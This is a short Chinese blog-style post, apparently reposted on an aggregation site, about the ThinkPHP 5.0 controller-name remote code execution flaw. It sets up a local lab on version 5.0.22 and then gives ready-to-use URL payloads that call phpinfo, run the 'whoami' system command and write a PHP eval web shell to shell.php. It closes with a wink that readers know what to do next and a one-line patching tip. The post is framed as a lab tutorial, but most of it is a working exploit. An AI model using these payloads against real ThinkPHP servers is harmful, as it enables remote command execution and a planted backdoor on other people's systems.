微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

thinkphp5.0远程执行漏洞

0x01 漏洞简介

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell(可以控制服务器)

 

0x02 环境搭建

PHPstudy:  PHP-5.5.38+Apache

下载存在漏洞版本我下载的版本是thinkPHP_5.0.22搭建好以后如图

下载链接http://www.thinkphp.cn/donate/download/id/1261.html

 

 

 

0x03 漏洞payload

 PHPinfo页面

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

 

 

执行whoami命令:

http://127.0.0.1/thinkphp_5.0.22/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 

 

 

 

写shell:

 

http://127.0.0.1/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22snowwolf%22])?^%3E%3Eshell.php

 

 

 

 

 

 

 

 

 

然后就你们就知道该怎么做了吧。

哈哈哈

 

0X03漏洞修复

建议更新到最新版本

 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐